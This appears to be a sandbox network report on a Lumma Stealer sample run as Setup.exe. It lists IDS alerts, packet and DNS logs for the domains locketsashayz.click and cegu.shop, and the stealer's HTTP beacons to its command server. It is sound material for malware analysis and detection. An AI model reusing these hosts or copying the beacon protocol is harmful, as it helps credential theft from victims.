2025-01-01T16:56:31.060448+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49740 | 188.114.97.3 | 443 | TCP
2025-01-01T16:56:33.202102+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49741 | 188.114.97.3 | 443 | TCP
2025-01-01T16:56:34.766559+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49742 | 188.114.97.3 | 443 | TCP
2025-01-01T16:56:35.522155+0100 | 2048094 | ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration | 1 | 192.168.2.4 | 49742 | 188.114.97.3 | 443 | TCP
2025-01-01T16:56:36.458976+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49743 | 188.114.97.3 | 443 | TCP
2025-01-01T16:56:38.632283+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49744 | 188.114.97.3 | 443 | TCP
2025-01-01T16:56:39.103074+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.4 | 49744 | 188.114.97.3 | 443 | TCP
2025-01-01T16:56:39.907939+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49745 | 185.161.251.21 | 443 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jan 1, 2025 16:56:21.441757917 CET | 49730 | 443 | 192.168.2.4 | 188.114.97.3
Jan 1, 2025 16:56:21.441796064 CET | 443 | 49730 | 188.114.97.3 | 192.168.2.4
Jan 1, 2025 16:56:21.442115068 CET | 49730 | 443 | 192.168.2.4 | 188.114.97.3
Jan 1, 2025 16:56:21.444853067 CET | 49730 | 443 | 192.168.2.4 | 188.114.97.3
Jan 1, 2025 16:56:21.444871902 CET | 443 | 49730 | 188.114.97.3 | 192.168.2.4
Jan 1, 2025 16:56:21.916558981 CET | 443 | 49730 | 188.114.97.3 | 192.168.2.4
Jan 1, 2025 16:56:21.916764975 CET | 49730 | 443 | 192.168.2.4 | 188.114.97.3
Jan 1, 2025 16:56:21.920741081 CET | 49730 | 443 | 192.168.2.4 | 188.114.97.3
Jan 1, 2025 16:56:21.920764923 CET | 443 | 49730 | 188.114.97.3 | 192.168.2.4
Jan 1, 2025 16:56:21.921097040 CET | 443 | 49730 | 188.114.97.3 | 192.168.2.4
Jan 1, 2025 16:56:21.970078945 CET | 49730 | 443 | 192.168.2.4 | 188.114.97.3
Jan 1, 2025 16:56:21.970118999 CET | 49730 | 443 | 192.168.2.4 | 188.114.97.3
Jan 1, 2025 16:56:21.970231056 CET | 443 | 49730 | 188.114.97.3 | 192.168.2.4
Jan 1, 2025 16:56:22.676179886 CET | 443 | 49730 | 188.114.97.3 | 192.168.2.4
Jan 1, 2025 16:56:22.676264048 CET | 443 | 49730 | 188.114.97.3 | 192.168.2.4
Jan 1, 2025 16:56:22.676429033 CET | 49730 | 443 | 192.168.2.4 | 188.114.97.3
Jan 1, 2025 16:56:22.678301096 CET | 49730 | 443 | 192.168.2.4 | 188.114.97.3
Jan 1, 2025 16:56:22.678323030 CET | 443 | 49730 | 188.114.97.3 | 192.168.2.4
Jan 1, 2025 16:56:22.688311100 CET | 49731 | 443 | 192.168.2.4 | 188.114.97.3
Jan 1, 2025 16:56:22.688358068 CET | 443 | 49731 | 188.114.97.3 | 192.168.2.4
Jan 1, 2025 16:56:22.688431978 CET | 49731 | 443 | 192.168.2.4 | 188.114.97.3
Jan 1, 2025 16:56:22.688901901 CET | 49731 | 443 | 192.168.2.4 | 188.114.97.3
Jan 1, 2025 16:56:22.688913107 CET | 443 | 49731 | 188.114.97.3 | 192.168.2.4
Jan 1, 2025 16:56:23.165998936 CET | 443 | 49731 | 188.114.97.3 | 192.168.2.4
Jan 1, 2025 16:56:23.166076899 CET | 49731 | 443 | 192.168.2.4 | 188.114.97.3
Jan 1, 2025 16:56:23.167455912 CET | 49731 | 443 | 192.168.2.4 | 188.114.97.3
Jan 1, 2025 16:56:23.167467117 CET | 443 | 49731 | 188.114.97.3 | 192.168.2.4
Jan 1, 2025 16:56:23.167730093 CET | 443 | 49731 | 188.114.97.3 | 192.168.2.4
Jan 1, 2025 16:56:23.168962002 CET | 49731 | 443 | 192.168.2.4 | 188.114.97.3
Jan 1, 2025 16:56:23.168996096 CET | 49731 | 443 | 192.168.2.4 | 188.114.97.3
Jan 1, 2025 16:56:23.169044018 CET | 443 | 49731 | 188.114.97.3 | 192.168.2.4
Jan 1, 2025 16:56:23.640625954 CET | 443 | 49731 | 188.114.97.3 | 192.168.2.4
Jan 1, 2025 16:56:23.640708923 CET | 443 | 49731 | 188.114.97.3 | 192.168.2.4
Jan 1, 2025 16:56:23.640743971 CET | 443 | 49731 | 188.114.97.3 | 192.168.2.4
Jan 1, 2025 16:56:23.640765905 CET | 49731 | 443 | 192.168.2.4 | 188.114.97.3
Jan 1, 2025 16:56:23.640778065 CET | 443 | 49731 | 188.114.97.3 | 192.168.2.4
Jan 1, 2025 16:56:23.640800953 CET | 443 | 49731 | 188.114.97.3 | 192.168.2.4
Jan 1, 2025 16:56:23.640819073 CET | 49731 | 443 | 192.168.2.4 | 188.114.97.3
Jan 1, 2025 16:56:23.640836954 CET | 443 | 49731 | 188.114.97.3 | 192.168.2.4
Jan 1, 2025 16:56:23.640892029 CET | 49731 | 443 | 192.168.2.4 | 188.114.97.3
Jan 1, 2025 16:56:23.640897989 CET | 443 | 49731 | 188.114.97.3 | 192.168.2.4
Jan 1, 2025 16:56:23.641078949 CET | 443 | 49731 | 188.114.97.3 | 192.168.2.4
Jan 1, 2025 16:56:23.641122103 CET | 49731 | 443 | 192.168.2.4 | 188.114.97.3
Jan 1, 2025 16:56:23.641127110 CET | 443 | 49731 | 188.114.97.3 | 192.168.2.4
Jan 1, 2025 16:56:23.645314932 CET | 443 | 49731 | 188.114.97.3 | 192.168.2.4
Jan 1, 2025 16:56:23.645345926 CET | 443 | 49731 | 188.114.97.3 | 192.168.2.4
Jan 1, 2025 16:56:23.645363092 CET | 49731 | 443 | 192.168.2.4 | 188.114.97.3
Jan 1, 2025 16:56:23.645370007 CET | 443 | 49731 | 188.114.97.3 | 192.168.2.4
Jan 1, 2025 16:56:23.645417929 CET | 49731 | 443 | 192.168.2.4 | 188.114.97.3
Jan 1, 2025 16:56:23.731071949 CET | 443 | 49731 | 188.114.97.3 | 192.168.2.4
Jan 1, 2025 16:56:23.731132030 CET | 443 | 49731 | 188.114.97.3 | 192.168.2.4
Jan 1, 2025 16:56:23.731158972 CET | 443 | 49731 | 188.114.97.3 | 192.168.2.4
Jan 1, 2025 16:56:23.731184006 CET | 49731 | 443 | 192.168.2.4 | 188.114.97.3
Jan 1, 2025 16:56:23.731209040 CET | 443 | 49731 | 188.114.97.3 | 192.168.2.4
Jan 1, 2025 16:56:23.731256008 CET | 49731 | 443 | 192.168.2.4 | 188.114.97.3
Jan 1, 2025 16:56:23.767720938 CET | 443 | 49731 | 188.114.97.3 | 192.168.2.4
Jan 1, 2025 16:56:23.767838001 CET | 443 | 49731 | 188.114.97.3 | 192.168.2.4
Jan 1, 2025 16:56:23.767895937 CET | 49731 | 443 | 192.168.2.4 | 188.114.97.3
Jan 1, 2025 16:56:23.768784046 CET | 49731 | 443 | 192.168.2.4 | 188.114.97.3
Jan 1, 2025 16:56:23.768810987 CET | 443 | 49731 | 188.114.97.3 | 192.168.2.4
Jan 1, 2025 16:56:23.768825054 CET | 49731 | 443 | 192.168.2.4 | 188.114.97.3
Jan 1, 2025 16:56:23.768830061 CET | 443 | 49731 | 188.114.97.3 | 192.168.2.4
Jan 1, 2025 16:56:24.155690908 CET | 49732 | 443 | 192.168.2.4 | 188.114.97.3
Jan 1, 2025 16:56:24.155740976 CET | 443 | 49732 | 188.114.97.3 | 192.168.2.4
Jan 1, 2025 16:56:24.156992912 CET | 49732 | 443 | 192.168.2.4 | 188.114.97.3
Jan 1, 2025 16:56:24.160866976 CET | 49732 | 443 | 192.168.2.4 | 188.114.97.3
Jan 1, 2025 16:56:24.160883904 CET | 443 | 49732 | 188.114.97.3 | 192.168.2.4
Jan 1, 2025 16:56:24.615832090 CET | 443 | 49732 | 188.114.97.3 | 192.168.2.4
Jan 1, 2025 16:56:24.615968943 CET | 49732 | 443 | 192.168.2.4 | 188.114.97.3
Jan 1, 2025 16:56:24.618133068 CET | 49732 | 443 | 192.168.2.4 | 188.114.97.3
Jan 1, 2025 16:56:24.618143082 CET | 443 | 49732 | 188.114.97.3 | 192.168.2.4
Jan 1, 2025 16:56:24.618347883 CET | 443 | 49732 | 188.114.97.3 | 192.168.2.4
Jan 1, 2025 16:56:24.619719982 CET | 49732 | 443 | 192.168.2.4 | 188.114.97.3
Jan 1, 2025 16:56:24.619719982 CET | 49732 | 443 | 192.168.2.4 | 188.114.97.3
Jan 1, 2025 16:56:24.619754076 CET | 443 | 49732 | 188.114.97.3 | 192.168.2.4
Jan 1, 2025 16:56:24.619857073 CET | 49732 | 443 | 192.168.2.4 | 188.114.97.3
Jan 1, 2025 16:56:24.619863033 CET | 443 | 49732 | 188.114.97.3 | 192.168.2.4
Jan 1, 2025 16:56:25.248749018 CET | 443 | 49732 | 188.114.97.3 | 192.168.2.4
Jan 1, 2025 16:56:25.248827934 CET | 443 | 49732 | 188.114.97.3 | 192.168.2.4
Jan 1, 2025 16:56:25.248886108 CET | 49732 | 443 | 192.168.2.4 | 188.114.97.3
Jan 1, 2025 16:56:25.249126911 CET | 49732 | 443 | 192.168.2.4 | 188.114.97.3
Jan 1, 2025 16:56:25.249147892 CET | 443 | 49732 | 188.114.97.3 | 192.168.2.4
Jan 1, 2025 16:56:25.342849970 CET | 49735 | 443 | 192.168.2.4 | 188.114.97.3
Jan 1, 2025 16:56:25.342890978 CET | 443 | 49735 | 188.114.97.3 | 192.168.2.4
Jan 1, 2025 16:56:25.342969894 CET | 49735 | 443 | 192.168.2.4 | 188.114.97.3
Jan 1, 2025 16:56:25.343291044 CET | 49735 | 443 | 192.168.2.4 | 188.114.97.3
Jan 1, 2025 16:56:25.343310118 CET | 443 | 49735 | 188.114.97.3 | 192.168.2.4
Jan 1, 2025 16:56:25.800389051 CET | 443 | 49735 | 188.114.97.3 | 192.168.2.4
Jan 1, 2025 16:56:25.800458908 CET | 49735 | 443 | 192.168.2.4 | 188.114.97.3
Jan 1, 2025 16:56:25.801732063 CET | 49735 | 443 | 192.168.2.4 | 188.114.97.3
                                                                                                      Jan 1, 2025 16:56:25.801748037 CET44349735188.114.97.3192.168.2.4
                                                                                                      Jan 1, 2025 16:56:25.802006960 CET44349735188.114.97.3192.168.2.4
                                                                                                      Jan 1, 2025 16:56:25.803320885 CET49735443192.168.2.4188.114.97.3
                                                                                                      Jan 1, 2025 16:56:25.803370953 CET49735443192.168.2.4188.114.97.3
                                                                                                      Jan 1, 2025 16:56:25.803407907 CET44349735188.114.97.3192.168.2.4
                                                                                                      Jan 1, 2025 16:56:30.386774063 CET44349735188.114.97.3192.168.2.4
                                                                                                      Jan 1, 2025 16:56:30.386863947 CET44349735188.114.97.3192.168.2.4
                                                                                                      Jan 1, 2025 16:56:30.386907101 CET49735443192.168.2.4188.114.97.3
                                                                                                      Jan 1, 2025 16:56:30.387149096 CET49735443192.168.2.4188.114.97.3
                                                                                                      Jan 1, 2025 16:56:30.387176037 CET44349735188.114.97.3192.168.2.4
                                                                                                      Jan 1, 2025 16:56:30.603182077 CET49740443192.168.2.4188.114.97.3
                                                                                                      Jan 1, 2025 16:56:30.603245974 CET44349740188.114.97.3192.168.2.4
                                                                                                      Jan 1, 2025 16:56:30.603323936 CET49740443192.168.2.4188.114.97.3
                                                                                                      Jan 1, 2025 16:56:30.603598118 CET49740443192.168.2.4188.114.97.3
                                                                                                      Jan 1, 2025 16:56:30.603609085 CET44349740188.114.97.3192.168.2.4
                                                                                                      Jan 1, 2025 16:56:31.060374975 CET44349740188.114.97.3192.168.2.4
                                                                                                      Jan 1, 2025 16:56:31.060447931 CET49740443192.168.2.4188.114.97.3
                                                                                                      Jan 1, 2025 16:56:31.061857939 CET49740443192.168.2.4188.114.97.3
                                                                                                      Jan 1, 2025 16:56:31.061870098 CET44349740188.114.97.3192.168.2.4
                                                                                                      Jan 1, 2025 16:56:31.062127113 CET44349740188.114.97.3192.168.2.4
                                                                                                      Jan 1, 2025 16:56:31.070656061 CET49740443192.168.2.4188.114.97.3
                                                                                                      Jan 1, 2025 16:56:31.070820093 CET49740443192.168.2.4188.114.97.3
                                                                                                      Jan 1, 2025 16:56:31.070842981 CET44349740188.114.97.3192.168.2.4
                                                                                                      Jan 1, 2025 16:56:31.070903063 CET49740443192.168.2.4188.114.97.3
                                                                                                      Jan 1, 2025 16:56:31.070910931 CET44349740188.114.97.3192.168.2.4
                                                                                                      Jan 1, 2025 16:56:31.709590912 CET44349740188.114.97.3192.168.2.4
                                                                                                      Jan 1, 2025 16:56:31.709676981 CET44349740188.114.97.3192.168.2.4
                                                                                                      Jan 1, 2025 16:56:31.709887981 CET49740443192.168.2.4188.114.97.3
                                                                                                      Jan 1, 2025 16:56:31.710131884 CET49740443192.168.2.4188.114.97.3
                                                                                                      Jan 1, 2025 16:56:31.710148096 CET44349740188.114.97.3192.168.2.4
                                                                                                      Jan 1, 2025 16:56:32.736170053 CET49741443192.168.2.4188.114.97.3
                                                                                                      Jan 1, 2025 16:56:32.736217022 CET44349741188.114.97.3192.168.2.4
                                                                                                      Jan 1, 2025 16:56:32.736284971 CET49741443192.168.2.4188.114.97.3
                                                                                                      Jan 1, 2025 16:56:32.736669064 CET49741443192.168.2.4188.114.97.3
                                                                                                      Jan 1, 2025 16:56:32.736677885 CET44349741188.114.97.3192.168.2.4
                                                                                                      Jan 1, 2025 16:56:33.202022076 CET44349741188.114.97.3192.168.2.4
                                                                                                      Jan 1, 2025 16:56:33.202101946 CET49741443192.168.2.4188.114.97.3
                                                                                                      Jan 1, 2025 16:56:33.210484028 CET49741443192.168.2.4188.114.97.3
                                                                                                      Jan 1, 2025 16:56:33.210495949 CET44349741188.114.97.3192.168.2.4
                                                                                                      Jan 1, 2025 16:56:33.210813999 CET44349741188.114.97.3192.168.2.4
                                                                                                      Jan 1, 2025 16:56:33.211906910 CET49741443192.168.2.4188.114.97.3
                                                                                                      Jan 1, 2025 16:56:33.212054014 CET49741443192.168.2.4188.114.97.3
                                                                                                      Jan 1, 2025 16:56:33.212070942 CET44349741188.114.97.3192.168.2.4
                                                                                                      Jan 1, 2025 16:56:34.097760916 CET44349741188.114.97.3192.168.2.4
                                                                                                      Jan 1, 2025 16:56:34.097846031 CET44349741188.114.97.3192.168.2.4
                                                                                                      Jan 1, 2025 16:56:34.097919941 CET49741443192.168.2.4188.114.97.3
                                                                                                      Jan 1, 2025 16:56:34.098086119 CET49741443192.168.2.4188.114.97.3
                                                                                                      Jan 1, 2025 16:56:34.098107100 CET44349741188.114.97.3192.168.2.4
                                                                                                      Jan 1, 2025 16:56:34.232173920 CET49742443192.168.2.4188.114.97.3
                                                                                                      Jan 1, 2025 16:56:34.232229948 CET44349742188.114.97.3192.168.2.4
                                                                                                      Jan 1, 2025 16:56:34.232312918 CET49742443192.168.2.4188.114.97.3
                                                                                                      Jan 1, 2025 16:56:34.232589960 CET49742443192.168.2.4188.114.97.3
                                                                                                      Jan 1, 2025 16:56:34.232604027 CET44349742188.114.97.3192.168.2.4
                                                                                                      Jan 1, 2025 16:56:34.766465902 CET44349742188.114.97.3192.168.2.4
                                                                                                      Jan 1, 2025 16:56:34.766558886 CET49742443192.168.2.4188.114.97.3
                                                                                                      Jan 1, 2025 16:56:34.802192926 CET49742443192.168.2.4188.114.97.3
                                                                                                      Jan 1, 2025 16:56:34.802227974 CET44349742188.114.97.3192.168.2.4
                                                                                                      Jan 1, 2025 16:56:34.802531004 CET44349742188.114.97.3192.168.2.4
                                                                                                      Jan 1, 2025 16:56:34.811588049 CET49742443192.168.2.4188.114.97.3
                                                                                                      Jan 1, 2025 16:56:34.811656952 CET49742443192.168.2.4188.114.97.3
                                                                                                      Jan 1, 2025 16:56:34.811666012 CET44349742188.114.97.3192.168.2.4
                                                                                                      Jan 1, 2025 16:56:35.522154093 CET44349742188.114.97.3192.168.2.4
                                                                                                      Jan 1, 2025 16:56:35.522244930 CET44349742188.114.97.3192.168.2.4
                                                                                                      Jan 1, 2025 16:56:35.522294044 CET49742443192.168.2.4188.114.97.3
                                                                                                      Jan 1, 2025 16:56:35.522433043 CET49742443192.168.2.4188.114.97.3
                                                                                                      Jan 1, 2025 16:56:35.522452116 CET44349742188.114.97.3192.168.2.4
                                                                                                      Jan 1, 2025 16:56:35.972893953 CET49743443192.168.2.4188.114.97.3
                                                                                                      Jan 1, 2025 16:56:35.972953081 CET44349743188.114.97.3192.168.2.4
                                                                                                      Jan 1, 2025 16:56:35.973356962 CET49743443192.168.2.4188.114.97.3
                                                                                                      Jan 1, 2025 16:56:35.973356962 CET49743443192.168.2.4188.114.97.3
                                                                                                      Jan 1, 2025 16:56:35.973402977 CET44349743188.114.97.3192.168.2.4
                                                                                                      Jan 1, 2025 16:56:36.458833933 CET44349743188.114.97.3192.168.2.4
                                                                                                      Jan 1, 2025 16:56:36.458976030 CET49743443192.168.2.4188.114.97.3
                                                                                                      Jan 1, 2025 16:56:36.460387945 CET49743443192.168.2.4188.114.97.3
                                                                                                      Jan 1, 2025 16:56:36.460405111 CET44349743188.114.97.3192.168.2.4
                                                                                                      Jan 1, 2025 16:56:36.460622072 CET44349743188.114.97.3192.168.2.4
                                                                                                      Jan 1, 2025 16:56:36.462723017 CET49743443192.168.2.4188.114.97.3
                                                                                                      Jan 1, 2025 16:56:36.462723017 CET49743443192.168.2.4188.114.97.3
                                                                                                      Jan 1, 2025 16:56:36.462770939 CET44349743188.114.97.3192.168.2.4
                                                                                                      Jan 1, 2025 16:56:36.463514090 CET49743443192.168.2.4188.114.97.3
                                                                                                      Jan 1, 2025 16:56:36.463553905 CET44349743188.114.97.3192.168.2.4
                                                                                                      Jan 1, 2025 16:56:36.464538097 CET49743443192.168.2.4188.114.97.3
                                                                                                      Jan 1, 2025 16:56:36.464585066 CET44349743188.114.97.3192.168.2.4
                                                                                                      Jan 1, 2025 16:56:36.464915991 CET49743443192.168.2.4188.114.97.3
                                                                                                      Jan 1, 2025 16:56:36.464955091 CET44349743188.114.97.3192.168.2.4
                                                                                                      Jan 1, 2025 16:56:36.465275049 CET49743443192.168.2.4188.114.97.3
                                                                                                      Jan 1, 2025 16:56:36.465307951 CET44349743188.114.97.3192.168.2.4
                                                                                                      Jan 1, 2025 16:56:36.465466976 CET49743443192.168.2.4188.114.97.3
                                                                                                      Jan 1, 2025 16:56:36.465495110 CET44349743188.114.97.3192.168.2.4
                                                                                                      Jan 1, 2025 16:56:36.465503931 CET49743443192.168.2.4188.114.97.3
                                                                                                      Jan 1, 2025 16:56:36.465516090 CET44349743188.114.97.3192.168.2.4
                                                                                                      Jan 1, 2025 16:56:36.465692043 CET49743443192.168.2.4188.114.97.3
                                                                                                      Jan 1, 2025 16:56:36.465715885 CET44349743188.114.97.3192.168.2.4
                                                                                                      Jan 1, 2025 16:56:36.465740919 CET49743443192.168.2.4188.114.97.3
                                                                                                      Jan 1, 2025 16:56:36.465909958 CET49743443192.168.2.4188.114.97.3
                                                                                                      Jan 1, 2025 16:56:36.465939045 CET49743443192.168.2.4188.114.97.3
                                                                                                      Jan 1, 2025 16:56:36.473650932 CET44349743188.114.97.3192.168.2.4
                                                                                                      Jan 1, 2025 16:56:36.477093935 CET49743443192.168.2.4188.114.97.3
                                                                                                      Jan 1, 2025 16:56:36.477129936 CET44349743188.114.97.3192.168.2.4
                                                                                                      Jan 1, 2025 16:56:36.477157116 CET49743443192.168.2.4188.114.97.3
                                                                                                      Jan 1, 2025 16:56:36.477194071 CET49743443192.168.2.4188.114.97.3
                                                                                                      Jan 1, 2025 16:56:36.477353096 CET49743443192.168.2.4188.114.97.3
                                                                                                      Jan 1, 2025 16:56:36.478533030 CET44349743188.114.97.3192.168.2.4
                                                                                                      Jan 1, 2025 16:56:38.124366045 CET44349743188.114.97.3192.168.2.4
                                                                                                      Jan 1, 2025 16:56:38.124465942 CET44349743188.114.97.3192.168.2.4
                                                                                                      Jan 1, 2025 16:56:38.125014067 CET49743443192.168.2.4188.114.97.3
                                                                                                      Jan 1, 2025 16:56:38.125190973 CET49743443192.168.2.4188.114.97.3
                                                                                                      Jan 1, 2025 16:56:38.125211954 CET44349743188.114.97.3192.168.2.4
                                                                                                      Jan 1, 2025 16:56:38.156989098 CET49744443192.168.2.4188.114.97.3
                                                                                                      Jan 1, 2025 16:56:38.157049894 CET44349744188.114.97.3192.168.2.4
                                                                                                      Jan 1, 2025 16:56:38.157289982 CET49744443192.168.2.4188.114.97.3
                                                                                                      Jan 1, 2025 16:56:38.157668114 CET49744443192.168.2.4188.114.97.3
                                                                                                      Jan 1, 2025 16:56:38.157684088 CET44349744188.114.97.3192.168.2.4
                                                                                                      Jan 1, 2025 16:56:38.632189035 CET44349744188.114.97.3192.168.2.4
                                                                                                      Jan 1, 2025 16:56:38.632282972 CET49744443192.168.2.4188.114.97.3
                                                                                                      Jan 1, 2025 16:56:38.633755922 CET49744443192.168.2.4188.114.97.3
                                                                                                      Jan 1, 2025 16:56:38.633766890 CET44349744188.114.97.3192.168.2.4
                                                                                                      Jan 1, 2025 16:56:38.633970022 CET44349744188.114.97.3192.168.2.4
                                                                                                      Jan 1, 2025 16:56:38.635232925 CET49744443192.168.2.4188.114.97.3
                                                                                                      Jan 1, 2025 16:56:38.635246992 CET49744443192.168.2.4188.114.97.3
                                                                                                      Jan 1, 2025 16:56:38.635288954 CET44349744188.114.97.3192.168.2.4
                                                                                                      Jan 1, 2025 16:56:39.103025913 CET44349744188.114.97.3192.168.2.4
                                                                                                      Jan 1, 2025 16:56:39.103115082 CET44349744188.114.97.3192.168.2.4
                                                                                                      Jan 1, 2025 16:56:39.103177071 CET49744443192.168.2.4188.114.97.3
                                                                                                      Jan 1, 2025 16:56:39.103404045 CET49744443192.168.2.4188.114.97.3
                                                                                                      Jan 1, 2025 16:56:39.103426933 CET44349744188.114.97.3192.168.2.4
                                                                                                      Jan 1, 2025 16:56:39.166307926 CET49745443192.168.2.4185.161.251.21
                                                                                                      Jan 1, 2025 16:56:39.166347980 CET44349745185.161.251.21192.168.2.4
                                                                                                      Jan 1, 2025 16:56:39.166580915 CET49745443192.168.2.4185.161.251.21
                                                                                                      Jan 1, 2025 16:56:39.168109894 CET49745443192.168.2.4185.161.251.21
                                                                                                      Jan 1, 2025 16:56:39.168119907 CET44349745185.161.251.21192.168.2.4
                                                                                                      Jan 1, 2025 16:56:39.907763958 CET44349745185.161.251.21192.168.2.4
                                                                                                      Jan 1, 2025 16:56:39.907938957 CET49745443192.168.2.4185.161.251.21
                                                                                                      Jan 1, 2025 16:56:39.913368940 CET49745443192.168.2.4185.161.251.21
                                                                                                      Jan 1, 2025 16:56:39.913378000 CET44349745185.161.251.21192.168.2.4
                                                                                                      Jan 1, 2025 16:56:39.913681984 CET44349745185.161.251.21192.168.2.4
                                                                                                      Jan 1, 2025 16:56:39.916039944 CET49745443192.168.2.4185.161.251.21
                                                                                                      Jan 1, 2025 16:56:39.963340044 CET44349745185.161.251.21192.168.2.4
                                                                                                      Jan 1, 2025 16:56:40.175007105 CET44349745185.161.251.21192.168.2.4
                                                                                                      Jan 1, 2025 16:56:40.175081968 CET44349745185.161.251.21192.168.2.4
                                                                                                      Jan 1, 2025 16:56:40.175262928 CET49745443192.168.2.4185.161.251.21
                                                                                                      Jan 1, 2025 16:56:40.175537109 CET49745443192.168.2.4185.161.251.21
                                                                                                      Jan 1, 2025 16:56:40.175558090 CET44349745185.161.251.21192.168.2.4
                                                                                                      Jan 1, 2025 16:56:40.175575018 CET49745443192.168.2.4185.161.251.21
                                                                                                      Jan 1, 2025 16:56:40.175580978 CET44349745185.161.251.21192.168.2.4
UDP Packets

Timestamp                           Source Port  Dest Port  Source IP    Dest IP
Jan 1, 2025 16:56:21.423703909 CET  56860        53         192.168.2.4  1.1.1.1
Jan 1, 2025 16:56:21.436892986 CET  53           56860      1.1.1.1      192.168.2.4
Jan 1, 2025 16:56:39.105029106 CET  61073        53         192.168.2.4  1.1.1.1
Jan 1, 2025 16:56:39.164027929 CET  53           61073      1.1.1.1      192.168.2.4
DNS Queries

Timestamp                           Source IP    Dest IP  Trans ID  OP Code             Name                 Type            Class        DNS over HTTPS
Jan 1, 2025 16:56:21.423703909 CET  192.168.2.4  1.1.1.1  0x4f54    Standard query (0)  locketsashayz.click  A (IP address)  IN (0x0001)  false
Jan 1, 2025 16:56:39.105029106 CET  192.168.2.4  1.1.1.1  0xcf4c    Standard query (0)  cegu.shop            A (IP address)  IN (0x0001)  false

DNS Answers

Timestamp                           Source IP  Dest IP      Trans ID  Reply Code    Name                 CName  Address         Type            Class        DNS over HTTPS
Jan 1, 2025 16:56:21.436892986 CET  1.1.1.1    192.168.2.4  0x4f54    No error (0)  locketsashayz.click  -      188.114.97.3    A (IP address)  IN (0x0001)  false
Jan 1, 2025 16:56:21.436892986 CET  1.1.1.1    192.168.2.4  0x4f54    No error (0)  locketsashayz.click  -      188.114.96.3    A (IP address)  IN (0x0001)  false
Jan 1, 2025 16:56:39.164027929 CET  1.1.1.1    192.168.2.4  0xcf4c    No error (0)  cegu.shop            -      185.161.251.21  A (IP address)  IN (0x0001)  false
                                                                                                      • locketsashayz.click
                                                                                                      • cegu.shop
HTTP Request Dependency Graph

Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
0           192.168.2.4  49730        188.114.97.3    443               6984  C:\Users\user\Desktop\Setup.exe
Timestamp                Bytes transferred  Direction  Data
2025-01-01 15:56:21 UTC  266                OUT
POST /api HTTP/1.1
                                                                                                      Connection: Keep-Alive
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                      Content-Length: 8
                                                                                                      Host: locketsashayz.click
2025-01-01 15:56:21 UTC  8                  OUT
Data Raw: 61 63 74 3d 6c 69 66 65
Data Ascii: act=life
2025-01-01 15:56:22 UTC  1125               IN
HTTP/1.1 200 OK
                                                                                                      Date: Wed, 01 Jan 2025 15:56:22 GMT
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Transfer-Encoding: chunked
                                                                                                      Connection: close
                                                                                                      Set-Cookie: PHPSESSID=mqrc2qatpmvgeqi2n18vudvpd9; expires=Sun, 27 Apr 2025 09:43:01 GMT; Max-Age=9999999; path=/
                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                      Pragma: no-cache
                                                                                                      X-Frame-Options: DENY
                                                                                                      X-Content-Type-Options: nosniff
                                                                                                      X-XSS-Protection: 1; mode=block
                                                                                                      cf-cache-status: DYNAMIC
                                                                                                      vary: accept-encoding
                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Bm63NidoglZi0XKe66hsxyH8Mjv2vnbkcFIF71CZcI3C9lqWZFr76WXBKI7P%2BNHnw8KQVTqcdKWPwCO5a9%2FeY4PZiuXIwbEPml2%2FsjUR0Ial09rXEy0AB9bqRPBIKYbrua9fpiTe"}],"group":"cf-nel","max_age":604800}
                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                      Server: cloudflare
                                                                                                      CF-RAY: 8fb3b2ed9b2b4229-EWR
                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1746&min_rtt=1734&rtt_var=675&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2847&recv_bytes=910&delivery_rate=1591280&cwnd=236&unsent_bytes=0&cid=daf394de9060f4f9&ts=773&x=0"
                                                                                                      2025-01-01 15:56:22 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                      Data Ascii: 2ok
                                                                                                      2025-01-01 15:56:22 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                      Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 49731 | 188.114.97.3 | 443 | 6984 | C:\Users\user\Desktop\Setup.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-01 15:56:23 UTC | 267 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 78
Host: locketsashayz.click
2025-01-01 15:56:23 UTC | 78 | OUT | Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 68 52 6a 7a 47 33 2d 2d 54 52 4f 4e 26 6a 3d 36 33 37 62 35 35 32 37 39 30 32 31 61 61 62 33 33 32 37 38 31 38 38 63 66 61 36 33 38 33 39 37
Data Ascii: act=recive_message&ver=4.0&lid=hRjzG3--TRON&j=637b55279021aab33278188cfa638397
2025-01-01 15:56:23 UTC | 1127 | IN | HTTP/1.1 200 OK
Date: Wed, 01 Jan 2025 15:56:23 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
